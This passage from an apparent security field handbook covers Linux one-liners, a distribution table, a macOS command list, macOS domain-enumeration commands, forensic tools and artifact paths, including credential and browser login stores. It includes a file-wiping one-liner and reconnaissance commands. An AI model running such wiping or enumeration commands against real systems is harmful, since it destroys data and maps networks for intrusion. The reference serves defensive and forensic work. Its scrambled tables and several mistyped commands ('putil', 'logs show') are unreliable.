netstat -tn 2>/dev/null | grep :80 | awk '{print $5}' | cut -d: -f1
| sort | uniq -c | sort -nr | head

Change the encoding of all files in a directory and subdirectories

find . -type f -name '*.java' -exec sh -c 'iconv -f cp1252 -t utf-
8 "$1" > converted && mv converted "$1"' -- {} \;

Tree-like output in ls
ls -R | grep ":$" | sed -e 's/:$//' -e 's/[^-][^\/]*\//--/g' -e
's/^/ /' -e 's/-/|/'

Find all files recursively with specified string in the filename

and output any lines found containing a different string.
find . -name *conf* -exec grep -Hni 'matching_text' {} \; >
matching_text.[Link]

Extract your external IP address using dig

dig +short [Link] @[Link]

Shred & Erase without shred

$ FN=[Link]; dd bs=1k count="`du -sk \"${FN}\" | cut -f1`"
if=/dev/urandom >"${FN}"; rm -f "${FN}"

REFERENCE:
[Link]
liner-758352f9aece
[Link]
[Link]
[Link]
[Link]
[Link]
[Link]
[Link]
[Link]

L L
LINUX_Versions
ALL INFORMATIONAL LINUX

150
All current distros and versions of Linux.

DISTRIBUTION DATE CURRENT LAST FORK

LEAF
Alpine Linux 2006 3.11.3 6/13/19 Project
Mandrake
ALT Linux 2001 8.2 7/10/13 Linux
Debian,
antiX 2007 17.4.1 8/24/17 MEPIS
Arch Linux
(UKM
ArchBang 2011 Rolling ? Edition)
inspired
Arch Linux 2002 Rolling Rolling from CRUX
BLAG 2002 140k 5/4/11 Fedora
Debian,
Bodhi Linux 2011 5.0.0 8/22/18 Ubuntu
Debian,
Canaima 2007 6 3/19/18 Ubuntu
Red Hat
Enterprise
Linux
CentOS 2003 8.0-1905 10/16/19 (RHEL)
Chakra 2010 Rolling ? Arch Linux
75.0.3770
Chrome OS 2009 .129 7/9/19 Chromium OS
RHEL,
ClearOS 2000 7.6.0 5/9/19 CentOS
CrunchBang Linux 2008 11 5/6/13 Debian
Debian,
Damn Small Linux 2003 4.4.10 11/18/08 Knoppix
Softlanding
Linux
System
Debian 1993 10.2 11/16/19 (SLS)
Debian Edu 2004 9.0+edu0 6/18/17 Debian
Devuan 2016 2.0.0 9/16/18 Debian
Debian(curr
ent),
Ubuntu,
Morphix(for
Deepin 2004 15.11 7/5/19 merly)
inspired
Dragora GNU/Linux- 3.0- from
Libre 2009 alpha2 9/28/18 Slackware
dyne:bolic 2005 3.0.0 9/8/11 Debian
Ubuntu,
Elementary OS 2011 5 10/16/18 Debian
ELinOS 1999 6.2 10/1/17 –
Emdebian Grip 2009 3.1 6/15/13 Debian

151
EndeavourOS 2019 Rolling 7/15/19 Arch Linux
Red Hat
Fedora 2003 31 10/29/19 Linux
Freespire 2001 4.8 12/20/18 Ubuntu
Gentoo Linux 2002 Rolling Rolling Enoch Linux
Guix 2012 1.0.1 5/2/19 –
4.0
gNewSense 2006 (Ucclia) 5/2/16 Debian
LinEx
gnuLinEx 2002 2013 2/11/13 Debian
Grml 2005 2018.12 12/31/18 Debian
Hyperbola GNU/Linux-
libre 2017 0.3 9/23/19 Arch Linux
Instant WebKiosk 2012 16 4/5/17 Debian
Kali Linux 2013 2019.4 5/21/19 Debian
Knoppix 2000 8.6 8/8/19 Debian
Debian,
Kodibuntu 2008 ? ? Ubuntu
Korora 2005 26 9/16/17 Fedora
Merged from
LibreCMC 2010 1.4.8 6/30/19 LibreWRT
Linspire 2001 7.0 SP1 4/8/18 Ubuntu
Debian(LMDE
), Ubuntu
(LTS
Linux Mint 2006 19.3 8/2/19 versions)
Linux Lite 2012 4.4 11/1/18 Ubuntu
Mandriva
Mageia 2010 7.1 7/1/19 Linux
Red Hat
Mandriva Linux 1998 2011 8/28/11 Linux
Manjaro Linux 2012 Rolling Rolling Arch Linux
MEPIS 2003 11.9.90 ? Debian
Musix GNU+Linux 2008 3.0.1 3/13/14 Debian
Debian,
Manjaro/Arc
Netrunner 2009 2018.08 3/11/18 h
NixOS 2003 19.09 5/2/19 –
SUSE Linux
Novell Open OES 2018 Enterprise
Enterprise Server 2003 SP1 ? Server
OpenELEC 2011 8.0.4 6/4/17 Kodi
openSUSE 2006 Leap 15.1 5/22/19 –
OpenWrt 2007 18.06.4 7/1/19 –
Mandriva
OpenMandriva Lx 2013 4 5/12/19 Linux
Red Hat
Enterprise
Linux
Oracle Linux 2006 7.6 11/7/18 (RHEL)

152
Parabola GNU/Linux-
libre 2009 Rolling 5/28/17 Arch Linux
Gentoo
(2011.2)
Pardus 2005 17.5 11/3/18 Debian
Parsix 2005 8.15 1/25/17 Debian
2019_12_2 2019-12-
Parted Magic ? 4 34 -
Mandriva
PCLinuxOS 2003 2019.06 6/16/19 Linux
Pop! OS 2017 19.1 10/19/19 Ubuntu
Gentoo
Pentoo 2005 2019.1 1/17/19 Linux
Porteus 2010 4 4/29/18 Slackware
inspired by
Vector
Puppy Linux 2003 8 4/11/19 Linux
Xen and
Qubes OS 2012 4.0.1 1/9/19 Fedora
Red Hat
Red Hat Enterprise Linux,
Linux 2002 8 5/7/19 Fedora
Red Hat Linux 1995 9 3/31/03 –
ROSA 2011 R11 3/15/19 Mandriva
Rocks Cluster Red Hat
Distribution 2000 7 12/1/15 Linux
Gentoo
Sabayon Linux 2005 19.03 3/31/19 Linux
Salix OS 2009 14.2 8/29/16 Slackware
Red Hat
Linux, Red
Hat
Enterprise
Linux
Scientific Linux 2004 7.6 12/3/18 (RHEL)
Softlanding
Linux
System
Slackware 1993 14.2 6/30/16 (SLS)
Debian,
Slackware
(until Slax
Slax 2002 9.9.1 6/17/19 9)
SliTaz GNU/Linux 2008 Rolling 12/3/17 Ind
Solus 2005 Rolling 8/15/17 –
SolydXK 2013 201902 3/3/19 Debian
SparkyLinux 2012 5.7.1 4/3/19 Debian
Source Mage GNU/Linux 2002 0.62-11 10/22/17 Sorcerer
SteamOS 2013 2.195 7/19/19 Debian

153
 Slackware,
SUSE Linux Enterprise 2000 15SP1 8/12/19 Jurix
Tails 2009 3.14.2 6/23/19 Debian
inspired
Damn Small
Tiny Core Linux 2009 10.1 1/20/19 Linux
Gentoo
Linux
Embedded,
Tor-ramdisk 2008 20170130 1/30/17 uClibc
Trisquel GNU/Linux 2005 8 4/18/18 Ubuntu LTS
TurnKey GNU/Linux 2008 15.x 6/28/19 Debian
Ubuntu 2004 19.1 10/17/19 Debian
Univention Corporate
Server 2004 4.4 3/12/19 Debian
Ututo XS:
Gentoo
Linux,
Ututo UL:
Ututo 2000 XS 2012 4/27/12 Ubuntu
VectorLinux 1999 VL 7.2 8/28/17 Slackware
part/inspir
ed by
FreeBSD/Net
Void Linux 2008 Rolling 10/7/17 BSD
Webconverger 2007 35 5/19/16 Debian
Xandros 2001 ? 7/26/07 Corel Linux
Debian,
Zentyal 2005 6 10/30/18 Ubuntu
Zenwalk 2004 Rolling 3/9/18 Slackware
Zorin OS 2009 OS 15 6/5/19 Ubuntu

REFERENCE:
[Link]

154
M
M M
MACOS_Commands
ALL ADMINISTRATION MacOS
Defaults commands in MacOS.

A-Z COMMANDS DESCRIPTION

A
afconvert Audio File Convert
afinfo Audio File Info
afplay Audio File Play
airport Manage Apple AirPort
alias Create an alias
alloc List used and free memory
apropos Search the whatis database for strings
asr Apple Software Restore
atsutil Font registration system utility
awk Find and Replace text within file(s)
B
basename Convert a full pathname to just a filename
bash Bourne-Again SHell
bg Send to background
Set or display readline key and function
bind bindings
Set volume bootability and startup disk
bless options
break Exit from a For, While, Until or Select loop
builtin Execute a shell builtin
bzip2 Compress or decompress files
C

155
caffeinate Prevent the system from sleeping
cal Display a calendar
calendar Reminder Service
caller Return the context of a subroutine call
cancel Cancel print jobs
case Conditionally perform a command
Concatenate and print (display) the content
cat of files
cd Change Directory
chflags Change a file or folder's flags
chgrp Change group ownership
chmod Change access permissions
chown Change file owner and group
Run a command with a different root
chroot directory
cksum Print CRC checksum and byte counts
clear Clear terminal screen
cmp Compare two files
comm Compare two sorted files line by line
command Run a command (not a function)
Edit a command completion
complete [word/pattern/list]
continue Resume the next iteration of a loop
cp Copy one or more files to another location
cron Daemon to execute scheduled commands
Schedule a command to run at a later
crontab date/time
csplit Split a file into context-determined pieces
csrutil Configure System Integrity Protection (SIP)
Convert a file to another format using cups
cupsfilter filters
curl Transfer data from or to a server
cut Divide a file into several parts
D
date Display or change the date & time
dc Desk Calculator
dd Convert and copy a file, clone disks
declare Declare variable & set attributes
defaults Set preferences, show hidden files
df Display free disk space
diff Display the differences between two files
diff3 Show differences among three files
dig DNS lookup
dirname Convert a full pathname to just a path
dirs Display list of remembered directories
diskutil Disk utilities - Format, Verify, Repair
disown Unbind a job from the current login session
ditto Copy files and folders
dot_clean Remove dot-underscore files
drutil Interact with CD/DVD burners

156
 Query or flush the Directory Service/DNS
dscacheutil cache
dseditgroup Edit, create, manipulate, or delete groups
dsenableroot Enable root access
dsmemberutil View user and groups rights
dscl Directory Service command line utility
dtruss Print process system call time details
du Estimate file space usage
E
echo Display text on screen
ed A line-oriented text editor (edlin)
enable Enable and disable builtin shell commands
env List or Set environment variables
eval Evaluate several commands/arguments
exec Execute a command
exit Exit the shell
execsnoop Snoop new process execution
expand Convert tabs to spaces
Programmed dialogue with interactive
expect programs
F
fc Fix command (history)
Partition table manipulator for Darwin
fdisk UFS/HFS/DOS
FileVault configuration, list FileVault
fdesetup users
fg Send job to foreground
file Determine file type
Search for files that meet a desired
find criteria
fmt Reformat paragraph text
fold Wrap text to fit a specified width
for Loop command
fsck Filesystem consistency check and repair
fs_usage Filesystem usage (process/pathname)
ftp Internet file transfer program
function Define Function Macros
List processes that have one or more files
fuser open
G
GetFileInfo Get attributes of HFS+ files
getopt Parse positional parameters
getopts Parse positional parameters
goto Jump to label and continue execution
Search file(s) for lines that match a given
grep pattern
groups Print group names a user is in
gzip Compress or decompress files
H
halt Stop and restart the operating system

157
 Refresh the cached/remembered location of
hash commands
head Display the first lines of a file
hdiutil Manipulate iso disk images
history Command History
hostname Print or set system name
I
iconv Convert the character set of a file
id Print user and group names/id's
if Conditionally perform a command
ifconfig Configure network interface parameters
iostat Report CPU and i/o statistics
ipconfig View and control IP configuration state
info Help info
install Copy files and set attributes
iosnoop Snoop I/O events as they occur
J
jobs List active jobs
join Join lines on a common field
K
kextfind List kernel extensions
Display status of loaded kernel extensions
kextstat (kexts)
Terminate driver instances and unload kernel
kextunload extensions.
kickstart Configure Apple Remote Desktop
kill Kill a process by specifying its PID
killall Kill processes by name
L
l List files in long format (ls -l)
last Indicate last logins of users and ttys
launchctl Load or unload daemons/agents
List files in long format, showing invisible
ll files (ls -la)
less Display output one screen at a time
let Evaluate expression
lipo Convert a universal binary
Make links between files (hard links,
ln symbolic links)
local Set a local (function) variable
locate Find files
logname Print current login name
login log into the computer
logout Exit a login shell (bye)
look Display lines beginning with a given string
lp Print files
lpr Print files
lprm Remove jobs from the print queue
lpstat Printer status information
ls List information about file(s)

158
lsregister Reset the Launch Services database
lsbom List a bill of materials file
lsof List open files
M
man Help manual
mdfind Spotlight search
mdutil Manage Spotlight metadata store
mkdir Create new folder(s)
mkfifo Make FIFOs (named pipes)
mkfile Make a file
mktemp Make a temporary file
more Display output one screen at a time
mount Mount a file system
mv Move or rename files or directories
N
nano Simple text editor
nc/netcat Read and write data across networks
net Manage network resources
netstat Show network status
networksetup Network and System Preferences
nice Set the priority of a command
nohup Run a command immune to hangups
[Link] NTFS file system utility
nvram Manipulate firmware variables
O
onintr Control the action of a shell interrupt
open Open a file/folder/URL/Application
opensnoop Snoop file opens as they occur
openssl OpenSSL command line
osacompile Compile Applescript
osascript Execute AppleScript
P
passwd Modify a user password
paste Merge lines of files
pbcopy Copy data to the clipboard
pbpaste Paste data from the Clipboard
pgrep List processes by a full or partial name
ping Test a network connection
pkill Kill processes by a full or partial name
pkgbuild Build a macOS Installer component package
pkgutil Query and manipulate installed packages
plutil Property list utility
pmset Power Management settings
Restore the previous value of the current
popd directory •
pr Convert text files for printing
printenv List environment variables
printf Format and print data
ps Process status
pushd Save and then change the current directory

159
pwd Print Working Directory
Q
quota Display disk usage and limits
R
rcp Copy files between machines
read Read one line from standard input
readonly Mark a variable or function as read-only
reboot Stop and restart the system
ReportCrash Enable/Disable crash reporting
return Exit a function
rev Reverse lines of a file
rm Remove files
rmdir Remove folder(s)
rpm Remote Package Manager
rsync Remote file copy - Sync file tree
S
say Convert text to audible speech
Multiplex terminal, run remote shells via
screen ssh
screencapture Capture screen image to file or disk
scselect Switch between network locations
scutil Manage system configuration parameters
sdiff Merge two files interactively
Administer Keychains, keys, certificates and
security the Security framework
sed Stream Editor
select Generate a list of items
serverinfo Server information
set Set a shell variable = value
setfile Set attributes of HFS+ files
Create share points for afp, ftp and smb
sharing services
shasum Print or Check SHA Checksums
shift Shift positional parameters
shopt Set shell options
shutdown Shutdown or restart macOS
sips Scriptable image processing system
sleep Delay for a specified time
softwareupdate System software update tool
sort Sort text files
source Execute commands from a file
spctl Security assessment policy/Gatekeeper
split Split a file into fixed-size pieces
sqlite3 SQL database (download history)
srm Securely remove files or directories
stat Display the status of a file
stop Stop a job or process
su Substitute user identity
sudo Execute a command as another user
sum Print a checksum for a file

160
suspend Suspend execution of this shell
sw_vers Print macOS operating system version
sysctl Get or set kernel state
system_profiler Report system configuration
systemsetup Computer and display system settings
T
tail Output the last part of files
tar Tape ARchiver
tccutil Manage the privacy database
tcpdump Dump traffic on a network
tee Redirect output to multiple files
test Condition evaluation
Manipulate text files in various formats
textutil (Doc,html,rtf)
time Measure Program Resource Use
times Print shell & shell process times
tmutil Time Machine utility
top Display process information
touch Change file timestamps
Set terminal-dependent capabilities, color,
tput position
tr Translate, squeeze, and/or delete characters
Execute a command when the shell receives a
trap signal
traceroute Trace Route to Host
trimforce Enable TRIM commands on third-party drives
tty Print filename of terminal on stdin
type Describe a command
U
[Link] Mount/unmount UFS file system
ulimit limit the use of system-wide resources
umask Users file creation mask
umount Unmount a device
unalias Remove an alias
uname Print system information
unexpand Convert spaces to tabs
uniq Uniquify files
units Convert units from one scale to another
unset Remove variable or function names
until Loop command
uptime Show how long system has been running
Print login names of users currently logged
users in
until Execute commands (until error)
uuencode Encode a binary file
uudecode Decode a file created by uuencode
uuidgen Generate a Unique ID (UUID/GUID)
uucp Unix to Unix copy
V
vi Text Editor

161
 W
w Show who is logged on & what they are doing
wait Wait for a process to complete
wall Write a message to users
wc Print byte, word, and line counts
Search the whatis database for complete
whatis words
whereis Locate a program
which Locate a program file in the user's path
while Loop command •
who Print all usernames currently logged on
Print the current user id and name (`id -
whoami un')
write Send a message to another user
X
xargs Execute utility - passing arguments
xattr Display and manipulate extended attributes
xcode-select --
install Install the command line developer tools
Y
yes Print a string until interrupted
Z
zip Package and compress (archive) files.
!! Run the last command again

MacOS DOMAIN ENUMERATION COMMANDS

Domain: [Link]
User Enumeration:
dscl . ls /Users
dscl . read /Users/[username]
dscl "/Active Directory/TEST/All Domains" ls /Users
dscl "/Active Directory/TEST/All Domains" read /Users/[username]
dscacheutil -q user
LDAP:
ldapsearch -H ldap://[Link] -b DC=test,DC=local
"(objectclass=user)"
ldapsearch -H ldap://[Link] -b DC=test,DC=local
"(&(objectclass=user)(name=[username]))"

Computer Enumeration:
dscl "/Active Directory/TEST/All Domains" ls /Computers
dscl "/Active Directory/TEST/All Domains" read
"/Computers/[compname]$"
LDAP:
ldapsearch -H ldap://[Link] -b DC=test,DC=local
"(objectclass=computer)"

162
ldapsearch -H ldap://[Link] -b DC=test,DC=local
"(&(objectclass=computer)(name=[computername]))"

Group Enumeration:
dscl . ls /Groups
dscl . read "/Groups/[groupname]"
dscl "/Active Directory/TEST/All Domains" ls /Groups
dscl "/Active Directory/TEST/All Domains" read
"/Groups/[groupname]"
LDAP:
ldapsearch -H ldap://[Link] -b DC=test,DC=local
"(objectclass=group)"
ldapsearch -H ldap://[Link] -b DC=test,DC=local
"(&(objectclass=group)(name=[groupname]))"
ldapsearch -H ldap://[Link] -b DC=test,DC=local
"(&(objectclass=group)(name=*admin*))"

Domain Information:
dsconfigad -show
LDAP:
ldapsearch -H ldap://[Link] -b DC=test,DC=local
"(objectclass=trusteddomain)"

M M
MACOS_Defend
BLUE TEAM FORENSICS MacOS

Evidence Collection Order of Volatility (RFC3227)

• Registers, cache
• Routing table, arp cache, process table, kernel statistics,
memory
• Temporary file systems
• Disk
• Remote logging and monitoring data that is relevant to the
system in question
• Physical configuration, network topology
• Archival media

MacOS FORENSIC/DEFENSIVE TOOLS

VENATOR
macOS tool for proactive detection
REFERENCE:
[Link]

163
[Link]
detection-34055a017e56

Google Santa Process Whitelisting

Santa is a binary whitelisting/blacklisting system for macOS.
REFERENCE:
[Link]

KNOCK KNOCK
See what's persistently installed on your Mac. KnockKnock uncovers
persistently installed software in order to generically reveal
malware.
REFERENCE:
[Link]

LuLu
LuLu is the free, open firewall for Macs that can protect your
network connections and detect malicious activity.
REFERENCE:
[Link]

BlockBlock
BlockBlock provides continual protection by monitoring persistence
locations. Any new persistent component will trigger a BlockBlock
alert, allowing malicious items be blocked.
REFERENCE:
[Link]

Netiquette
Netiquette, a network monitor, allows one to explore all network
sockets and connections, either via an interactive UI, or from the
commandline.
REFERENCE:
[Link]

mac_apt
mac_apt is a DFIR tool to process Mac computer full disk images (or
live machines) and extract data/metadata useful for forensic
investigation.
REFERENCE:
[Link]

OSXCollector
The collection script runs on a potentially infected machine and
outputs a JSON file that describes the target machine. OSXCollector
gathers information from plists, SQLite databases and the local
file system.
REFERENCE:
[Link]

REVERSING MacOS MALWARE

164
#Install Apple Command Line Tools
Tools include:
strings -string decoder
file, nm, xattr, mdls -file analysis utilities
hexdump, od, xxd -hex editors
otool -static disassembler
lldb -debugger, memory reader and dynamic disassembler

#File type the malware sample:

file malware_file
xattr -l malware_file
ls -al@ malware_file

#If signed check _CodeSignature for IoCs.

codesign -dvvvv -r - malware_file.app/
#Look for TeamIdentifier & Bundle Identifier

#Check is certificate is still valid or revoked:

spctl --verbose=4 --assess --type execute malware_file.app

#Application Bundle Enumeration

putil -p malware_file.app/Contents/[Link]

#PageStuff & nm to look at internal structure

nm -m malware_file.app/MacOS/malware_file
pagestuff malware_file.app/MacOS/malware_file -a

#Dump Strings to a file for review

strings - malware_file > [Link]

#Use otool to find shared library links, method names, &

disassembly
otool -L malware_file > [Link]
otool -oV malware_file > [Link]
otool -tV malware_file > [Link]

MacOS MISC
Show System Logs
logs show > [Link]
sudo logs collect <time> --output <file>

MacOS ARTIFACT LOCATIONS

AUTORUN LOCATIONS
Launch Agents files /Library/LaunchAgents/*

165
" /System/Library/LaunchAgents/*
" %%[Link]%%/Library/LaunchAgents/*
Launch Daemons
files /Library/LaunchDaemons/*
" /System/Library/LaunchDaemons/*
Startup Items file /Library/StartupItems/*
" /System/Library/StartupItems/*
SYSTEM LOGS
System Log files
main folder /var/log/*
Apple System Log /var/log/asl/*
Audit Log /var/audit/*
Installation log /var/log/[Link]
Mac OS X utmp and
wmtp login record
file /var/log/wtmp
" /var/log/utmp
Mac OS X lastlog
file /var/log/lastlog
Mac OS X 10.5 utmpx
login record file /var/run/utmpx
Apple Unified
Logging and
Activity Tracing /var/db/diagnostics/*.tracev3
" /var/db/diagnostics/*/*.tracev3
" /var/db/uuidtext/*/*
SYSTEM PREFERENCES
System Preferences
plist files /Library/Preferences/**
Global Preferences /Library/Preferences/.[Link]
plist file st
/Library/Preferences/[Link].
Login Window Info plist
Bluetooth
Preferences and /Library/Preferences/[Link]
paierd device info ist
/Library/Preferences/[Link].
Time Machine Info plist
Keyboard layout /Library/Preferences/[Link]
plist file ist
System
configuration
preferences plist /Library/Preferences/SystemConfiguration/pr
file [Link]
SYSTEM
SETTINGS/INFO
OS Installation
time /var/db/.AppleSetupDone
/System/Library/CoreServices/SystemVersion.
OS name and version plist

166
Users Log In
Password Hash Plist /var/db/dslocal/nodes/Default/users/*.plist
SLEEP/HYBERNATE
SWAP
Sleep Image File /var/vm/sleepimage
Swap Files /var/vm/swapfile#
KERNEL EXTENSIONS
Kernel extension
(.kext) files /System/Library/Extensions/*
" /Library/Extensions/*
SOFTWARE
INSTALLATION
Software
Installation
History /Library/Receipts/[Link]
/Library/Preferences/[Link]
Software Update [Link]
SYSTEM INFO MISC.
Local Time Zone
configuration /etc/localtime
Mac OS X at jobs /usr/lib/cron/jobs/*
Cron tabs /etc/crontab
" /usr/lib/cron/tabs/*
Periodic system
functions scripts
and configuration /etc/defaults/[Link]
" /etc/[Link]
" /etc/[Link]
" /etc/periodic/**2
" /usr/local/etc/periodic/**2
" /etc/[Link]/*
" /etc/[Link]/*
" /etc/[Link]/*
" /etc/periodic/daily/*
" /etc/periodic/weekly/*
" /etc/periodic/monthly/*
NETWORKING
Hosts file /etc/hosts
Remembered Wireless /Library/Preferences/SystemConfiguration/co
Networks [Link]
USER ARTIFACTS
AUTORUN
%%[Link]%%/Library/Preferences/com.a
Login Items [Link]
USERS
Users directories
in /Users /Users/*
USER DIRECTORIES
Downloads Directory %%[Link]%%/Downloads/*

167
Documents Directory %%[Link]%%/Documents/*
Music Directory %%[Link]%%/Music/*
Desktop Directory %%[Link]%%/Desktop/*
Library Directory %%[Link]%%/Library/*
Movies Directory %%[Link]%%/Movies/*
Pictures Directory %%[Link]%%/Pictures/*
Public Directory %%[Link]%%/Public/*
Applications /Applications/*
PREFERENCES
User preferences
directory %%[Link]%%/Library/Preferences/*
iCloud user %%[Link]%%/Library/Preferences/Mobil
preferences [Link]
Sidebar Lists %%[Link]%%/Library/Preferences/com.a
Preferences [Link]
%%[Link]%%/Preferences/[Link]
" [Link]
User Global %%[Link]%%/Library/Preferences/.Glob
Preferences [Link]
%%[Link]%%/Library/Preferences/com.a
Dock database [Link]
%%[Link]%%/Library/Preferences/com.a
Attached iDevices [Link]
Quarantine Event %%[Link]%%/Library/Preferences/com.a
Database [Link]
%%[Link]%%/Library/Preferences/com.a
" [Link].QuarantineEventsV2
LOGS
User and
Applications Logs
Directory %%[Link]%%/Library/Logs/*
Misc. Logs /Library/Logs/*
Terminal Commands
History %%[Link]%%/.bash_history
Terminal Commands
Sessions %%[Link]%%/.bash_sessions/*
USER'S ACCOUNTS
User's Social %%[Link]%%/Library/Accounts/Accounts
Accounts [Link]
iDEVICE BACKUPS
iOS device backups %%[Link]%%/Library/Application
directory Support/MobileSync/Backup/*
iOS device backup %%[Link]%%/Library/Application
information Support/MobileSync/Backup/*/[Link]
iOS device backup %%[Link]%%/Library/Application
apps information Support/MobileSync/Backup/*/[Link]
iOS device backup %%[Link]%%/Library/Application
files information Support/MobileSync/Backup/*/[Link]
iOS device backup %%[Link]%%/Library/Application
status information Support/MobileSync/Backup/*/[Link]

168
RECENT ITEMS
%%[Link]%%/Library/Preferences/com.a
Recent Items [Link]
Recent Items
application %%[Link]%%/Library/Preferences/*LSSh
specific [Link]
MISC
Application Support %%[Link]%%/Library/Application
Directory Support/*
Keychain Directory %%[Link]%%/Library/Keychains/*
User Trash Folder %%[Link]%%/.Trash/*
macOS
NotificationCenter /private/var/folders/[a-z][0-
database 9]/*/0/[Link]/db2/db
/private/var/folders/[a-z][0-
" 9]/*/0/[Link]/db/db
%%[Link]%%/Library/Application
" Support/NotificationCenter/*.db
KnowledgeC User and
Application usage %%[Link]%%/Library/Application
database Support/Knowledge/[Link]
/private/var/db/CoreDuet/Knowledge/knowledg
" [Link]
APPLICATIONS
ARTIFACTS
iCLOUD
%%[Link]%%/Library/Application
iCloud Accounts Support/iCloud/Accounts/*
SKYPE
%%[Link]%%/Library/Application
Skype Directory Support/Skype/*
%%[Link]%%/Library/Application
Skype User profile Support/Skype/*/*
Skype Preferences %%[Link]%%/Library/Preferences/com.s
and Recent Searches [Link]
%%[Link]%%/Library/Application
Main Skype database Support/Skype/*/[Link]
%%[Link]%%/Library/Application
Chat Sync Directory Support/Skype/*/chatsync/*
SAFARI
Safari Main Folder %%[Link]%%/Library/Safari/*
%%[Link]%%/Library/Safari/Bookmarks.
Safari Bookmarks plist
%%[Link]%%/Library/Safari/Downloads.
Safari Downloads plist
Safari Installed %%[Link]%%/Library/Safari/Extensions
Extensions /[Link]
%%[Link]%%/Library/Safari/Extensions
" /*

169
 %%[Link]%%/Library/Safari/[Link]
Safari History ist
" %%[Link]%%/Library/Safari/[Link]
Safari History %%[Link]%%/Library/Safari/HistoryInd
Index [Link]
%%[Link]%%/Library/Safari/LastSessio
Safari Last Session [Link]
Safari Local %%[Link]%%/Library/Safari/LocalStora
Storage Directory ge/*
Safari Local %%[Link]%%/Library/Safari/LocalStora
Storage Database ge/[Link]
%%[Link]%%/Library/Safari/TopSites.p
Safari Top Sites list
Safari Webpage %%[Link]%%/Library/Safari/WebpageIco
Icons Database [Link]
Safari Webpage %%[Link]%%/Library/Safari/Databases/
Databases *
Safari Cache %%[Link]%%/Library/Caches/[Link].
Directory Safari/*
%%[Link]%%/Library/Caches/[Link].
Safari Cache Safari/[Link]
Safari Extensions %%[Link]%%/Library/Caches/[Link].
Cache Safari/Extensions/*
Safari Webpage %%[Link]%%/Library/Caches/[Link].
Previews Safari/Webpage Previews/*
%%[Link]%%/Library/Cookies/Cookies.b
Safari Cookies inarycookies
Safari Preferences %%[Link]%%/Library/Preferences/com.a
and Search terms [Link]
Safari Extension %%[Link]%%/Library/Preferences/com.a
Preferences [Link]
Safari Bookmark %%[Link]%%/Library/Caches/Metadata/S
Cache afari/Bookmarks/*
Safari History %%[Link]%%/Library/Caches/Metadata/S
Cache afari/History/*
Safari Temporary %%[Link]%%/Library/Caches/[Link].
Images Safari/fsCachedData/*
FIREFOX
%%[Link]%%/Library/Application
Firefox Directory Support/Firefox/*
%%[Link]%%/Library/Application
Firefox Profiles Support/Firefox/Profiles/*
%%[Link]%%/Library/Application
Firefox Cookies Support/Firefox/Profiles/*/[Link]
%%[Link]%%/Library/Application
Firefox Downloads Support/Firefox/Profiles/*/[Link]
%%[Link]%%/Library/Application
Firefox Form Support/Firefox/Profiles/*/[Link]
History te

170
 %%[Link]%%/Library/Application
Firefox History Support/Firefox/Profiles/*/[Link]
%%[Link]%%/Library/Application
Firefox Signon Support/Firefox/Profiles/*/[Link]
%%[Link]%%/Library/Application
Firefox Key Support/Firefox/Profiles/*/[Link]
%%[Link]%%/Library/Application
Support/Firefox/Profiles/*/[Link]
Firefox Permissions te
%%[Link]%%/Library/Application
Firefox Add-ons Support/Firefox/Profiles/*/[Link]
%%[Link]%%/Library/Application
" Support/Firefox/Profiles/*/[Link]
%%[Link]%%/Library/Application
Support/Firefox/Profiles/*/[Link]
Firefox Extension e
%%[Link]%%/Library/Application
" Support/Firefox/Profiles/*/[Link]
%%[Link]%%/Library/Application
Firefox Pages Support/Firefox/Profiles/*/content-
Settings [Link]
%%[Link]%%/Library/Caches/Firefox/Pr
Firefox Cache ofiles/*.default/Cache/*
%%[Link]%%/Library/Caches/Firefox/Pr
" ofiles/*.default/cache2/*
%%[Link]%%/Library/Caches/Firefox/Pr
" ofiles/*.default/cache2/doomed/*
%%[Link]%%/Library/Caches/Firefox/Pr
" ofiles/*.default/cache2/entries/*
CHROME
%%[Link]%%/Library/Application
Chrome Main Folder Support/Google/Chrome/*
Chrome Default %%[Link]%%/Library/Application
profile Support/Google/Chrome/default/*
%%[Link]%%/Library/Application
Chrome History Support/Google/Chrome/*/History
%%[Link]%%/Library/Application
" Support/Google/Chrome/*/Archived History
%%[Link]%%/Library/Application
Support/Google/Chrome Canary/*/Archived
" History
%%[Link]%%/Library/Application
" Support/Google/Chrome Canary/*/History
%%[Link]%%/Library/Application
Chrome Bookmarks Support/Google/Chrome/*/Bookmarks
%%[Link]%%/Library/Application
Chrome Cookies Support/Google/Chrome/*/Cookies
Chrome Local %%[Link]%%/Library/Application
Storage Support/Google/Chrome/*/Local Storage/*

171
 %%[Link]%%/Library/Application
Chrome Login Data Support/Google/Chrome/*/Login Data
%%[Link]%%/Library/Application
Chrome Top Sites Support/Google/Chrome/*/Top Sites
%%[Link]%%/Library/Application
Chrome Web Data Support/Google/Chrome/*/Web Data
%%[Link]%%/Library/Application
Chrome Extensions Support/Google/Chrome/*/databases/*
%%[Link]%%/Library/Application
Support/Google/Chrome/*/databases/Databases
" .db
%%[Link]%%/Library/Application
" Support/Google/Chrome/*/Extensions/**10
%%[Link]%%/Library/Application
Support/Google/Chrome
" Canary/*/Extensions/**{10}
Chrome Extension %%[Link]%%/Library/Application
Activity Support/Google/Chrome/*/Extension Activity
%%[Link]%%/Library/Application
Support/Google/Chrome Canary/*/Extension
" Activity
%%[Link]%%/Library/Caches/[Link]
Chrome Cache .Chrome/[Link]
%%[Link]%%/Library/Caches/Google/Chr
" ome/*/Cache/*
%%[Link]%%/Library/Caches/Google/Chr
" ome Canary/*/Cache/*
%%[Link]%%/Library/Caches/Google/Chr
Chrome Media Cache ome/*/Media Cache/*
%%[Link]%%/Library/Caches/Google/Chr
" ome Canary/*/Media Cache/*
%%[Link]%%/Library/Application
Chrome Application Support/Google/Chrome/*/Application
Cache Cache/Cache/*
%%[Link]%%/Library/Application
Support/Google/Chrome Canary/*/Application
" Cache/Cache/*
%%[Link]%%/Library/Application
Chrome GPU Cache Support/Google/Chrome/*/GPUCache/*
%%[Link]%%/Library/Application
" Support/Google/Chrome Canary/*/GPUCache/*
Chrome PNaCl %%[Link]%%/Library/Caches/Google/Chr
translation cache ome/PnaclTranslationCache/*
%%[Link]%%/Library/Caches/Google/Chr
" ome Canary/PnaclTranslationCache/*
Chrome Preferences %%[Link]%%/Library/Preferences/com.g
Files [Link]
%%[Link]%%/Library/Application
" Support/Google/Chrome/*/Preferences

172
 %%[Link]%%/Library/Application
" Support/Google/Chrome Canary/*/Preferences
CHROMIUM
%%[Link]%%/Library/Application
Chromium History Support/Chromium/*/Archived History
%%[Link]%%/Library/Application
" Support/Chromium/*/History
Chromium Cache %%[Link]%%/Caches/Chromium/*/Cache/*
